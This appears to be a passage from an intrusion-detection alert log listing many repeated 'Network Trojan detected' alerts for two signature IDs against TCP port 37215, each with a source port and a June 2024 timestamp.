              SID:2835222
              Source Port:54576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440141
              SID:2829579
              Source Port:49582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302594
              SID:2835222
              Source Port:38428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783485
              SID:2829579
              Source Port:55820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219216
              SID:2835222
              Source Port:51334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373687
              SID:2835222
              Source Port:41822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614838
              SID:2829579
              Source Port:37656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782655
              SID:2835222
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992917
              SID:2829579
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246155
              SID:2835222
              Source Port:41740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439621
              SID:2835222
              Source Port:45864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075040
              SID:2829579
              Source Port:34356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175243
              SID:2835222
              Source Port:52638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570225
              SID:2835222
              Source Port:39848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263539
              SID:2829579
              Source Port:34522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824107
              SID:2835222
              Source Port:55716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074491
              SID:2829579
              Source Port:48110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614536
              SID:2829579
              Source Port:41854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130859
              SID:2829579
              Source Port:52674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888640
              SID:2829579
              Source Port:45994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043442
              SID:2835222
              Source Port:38972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480506
              SID:2829579
              Source Port:55478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730094
              SID:2829579
              Source Port:37912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976078
              SID:2835222
              Source Port:49212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056746
              SID:2835222
              Source Port:40804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299440
              SID:2835222
              Source Port:45034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452994
              SID:2835222
              Source Port:52856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157314
              SID:2835222
              Source Port:33702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908057
              SID:2835222
              Source Port:36626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612691
              SID:2829579
              Source Port:60396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317072
              SID:2829579
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913124
              SID:2829579
              Source Port:46360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373058
              SID:2835222
              Source Port:44090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419532
              SID:2835222
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695455
              SID:2835222
              Source Port:42810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217642
              SID:2835222
              Source Port:42100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708924
              SID:2829579
              Source Port:34944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503695
              SID:2829579
              Source Port:36012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453739
              SID:2835222
              Source Port:53894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553699
              SID:2829579
              Source Port:44266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227465
              SID:2835222
              Source Port:57494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508007
              SID:2829579
              Source Port:57920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275646
              SID:2829579
              Source Port:42418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417869
              SID:2835222
              Source Port:57384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060356
              SID:2829579
              Source Port:59768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347080
              SID:2829579
              Source Port:41464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503202
              SID:2829579
              Source Port:37432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788753
              SID:2829579
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654163
              SID:2829579
              Source Port:51820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756560
              SID:2829579
              Source Port:34900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308669
              SID:2829579
              Source Port:48004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074588
              SID:2829579
              Source Port:40002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273816
              SID:2835222
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439794
              SID:2835222
              Source Port:48922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089484
              SID:2835222
              Source Port:56356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227164
              SID:2835222
              Source Port:48236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198846
              SID:2829579
              Source Port:49718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867218
              SID:2829579
              Source Port:41976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551314
              SID:2829579
              Source Port:53160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629144
              SID:2835222
              Source Port:57546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040496
              SID:2835222
              Source Port:44652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487194
              SID:2835222
              Source Port:33712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274687
              SID:2829579
              Source Port:58718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011222
              SID:2835222
              Source Port:34824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279503
              SID:2835222
              Source Port:41870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215297
              SID:2829579
              Source Port:56304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153934
              SID:2829579
              Source Port:45188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046214
              SID:2835222
              Source Port:33224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545229
              SID:2835222
              Source Port:49362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343586
              SID:2835222
              Source Port:36328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023603
              SID:2829579
              Source Port:41748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321551
              SID:2829579
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567990
              SID:2829579
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694481
              SID:2829579
              Source Port:44446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111308
              SID:2829579
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057492
              SID:2829579
              Source Port:34974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132358
              SID:2829579
              Source Port:57162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090283
              SID:2829579
              Source Port:42150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477207
              SID:2835222
              Source Port:44756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093899
              SID:2829579
              Source Port:51916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731810
              SID:2829579
              Source Port:38576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042663
              SID:2835222
              Source Port:52130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422231
              SID:2829579
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543324
              SID:2835222
              Source Port:51990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836763
              SID:2829579
              Source Port:39404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419958
              SID:2829579
              Source Port:57456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654484
              SID:2835222
              Source Port:50194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438887
              SID:2835222
              Source Port:33606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844199
              SID:2829579
              Source Port:33762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111254
              SID:2835222
              Source Port:50890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839021
              SID:2829579
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025384
              SID:2835222
              Source Port:35116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374801
              SID:2829579
              Source Port:38542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344134
              SID:2835222
              Source Port:39728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423346
              SID:2829579
              Source Port:59460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457346
              SID:2835222
              Source Port:40192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569090
              SID:2829579
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884969
              SID:2835222
              Source Port:48260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347545
              SID:2835222
              Source Port:60298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370310
              SID:2835222
              Source Port:43324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213693
              SID:2835222
              Source Port:34394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214345
              SID:2829579
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159049
              SID:2835222
              Source Port:45294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156147
              SID:2829579
              Source Port:35530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092203
              SID:2835222
              Source Port:40284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614580
              SID:2835222
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359645
              SID:2835222
              Source Port:47894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697027
              SID:2829579
              Source Port:55724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786905
              SID:2829579
              Source Port:37240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112128
              SID:2835222
              Source Port:34486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132565
              SID:2835222
              Source Port:55694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400927
              SID:2829579
              Source Port:50612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077066
              SID:2829579
              Source Port:60150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101227
              SID:2835222
              Source Port:40926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043888
              SID:2835222
              Source Port:40716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419079
              SID:2835222
              Source Port:43636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611448
              SID:2829579
              Source Port:51532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669304
              SID:2835222
              Source Port:54110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543107
              SID:2835222
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417688
              SID:2829579
              Source Port:51402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347396
              SID:2835222
              Source Port:49396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212901
              SID:2829579
              Source Port:58176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010880
              SID:2835222
              Source Port:56146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277722
              SID:2835222
              Source Port:46768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160237
              SID:2829579
              Source Port:34548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128352
              SID:2829579
              Source Port:42154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914690
              SID:2835222
              Source Port:43730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124694
              SID:2829579
              Source Port:57838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869670
              SID:2829579
              Source Port:39756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611985
              SID:2835222
              Source Port:47506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091621
              SID:2829579
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502934
              SID:2835222
              Source Port:37566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943211
              SID:2835222
              Source Port:40786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346146
              SID:2835222
              Source Port:55294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229335
              SID:2835222
              Source Port:59418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048811
              SID:2829579
              Source Port:53042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550845
              SID:2835222
              Source Port:37084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553888
              SID:2835222
              Source Port:49800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612240
              SID:2835222
              Source Port:60054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544580
              SID:2829579
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243418
              SID:2829579
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887289
              SID:2835222
              Source Port:59290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631090
              SID:2829579
              Source Port:56170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310479
              SID:2829579
              Source Port:43570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509981
              SID:2835222
              Source Port:40094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839077
              SID:2829579
              Source Port:42368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436639
              SID:2829579
              Source Port:42454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127966
              SID:2835222
              Source Port:47976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610981
              SID:2835222
              Source Port:43482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710092
              SID:2835222
              Source Port:58358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093048
              SID:2829579
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831839
              SID:2835222
              Source Port:35596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085844
              SID:2835222
              Source Port:35790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308849
              SID:2829579
              Source Port:42222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265969
              SID:2829579
              Source Port:54640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159139
              SID:2829579
              Source Port:35102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230550
              SID:2829579
              Source Port:48268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376251
              SID:2829579
              Source Port:48940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415950
              SID:2835222
              Source Port:48894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970410
              SID:2829579
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671251
              SID:2829579
              Source Port:58958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088859
              SID:2835222
              Source Port:51382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194354
              SID:2829579
              Source Port:47836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257672
              SID:2835222
              Source Port:33174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354814
              SID:2829579
              Source Port:53582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127246
              SID:2829579
              Source Port:55344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177813
              SID:2835222
              Source Port:48450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676538
              SID:2835222
              Source Port:47976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731259
              SID:2835222
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784572
              SID:2835222
              Source Port:35994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159177
              SID:2835222
              Source Port:51302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300909
              SID:2829579
              Source Port:40030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610959
              SID:2835222
              Source Port:55394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154550
              SID:2829579
              Source Port:42644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377302
              SID:2829579
              Source Port:45424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167797
              SID:2829579
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173077
              SID:2829579
              Source Port:39926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488718
              SID:2829579
              Source Port:38362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056832
              SID:2829579
              Source Port:33892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569083
              SID:2835222
              Source Port:50358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278770
              SID:2829579
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156121
              SID:2835222
              Source Port:54248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371308
              SID:2829579
              Source Port:57938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266390
              SID:2835222
              Source Port:56648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038329
              SID:2829579
              Source Port:44080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695610
              SID:2835222
              Source Port:49368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987665
              SID:2835222
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242408
              SID:2835222
              Source Port:51522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098720
              SID:2835222
              Source Port:46924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503335
              SID:2835222
              Source Port:56606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509522
              SID:2835222
              Source Port:54128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354787
              SID:2829579
              Source Port:33308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404439
              SID:2835222
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634279
              SID:2829579
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943321
              SID:2829579
              Source Port:40000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804251
              SID:2835222
              Source Port:44536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475279
              SID:2835222
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564959
              SID:2829579
              Source Port:43968
              Destination Port:37215
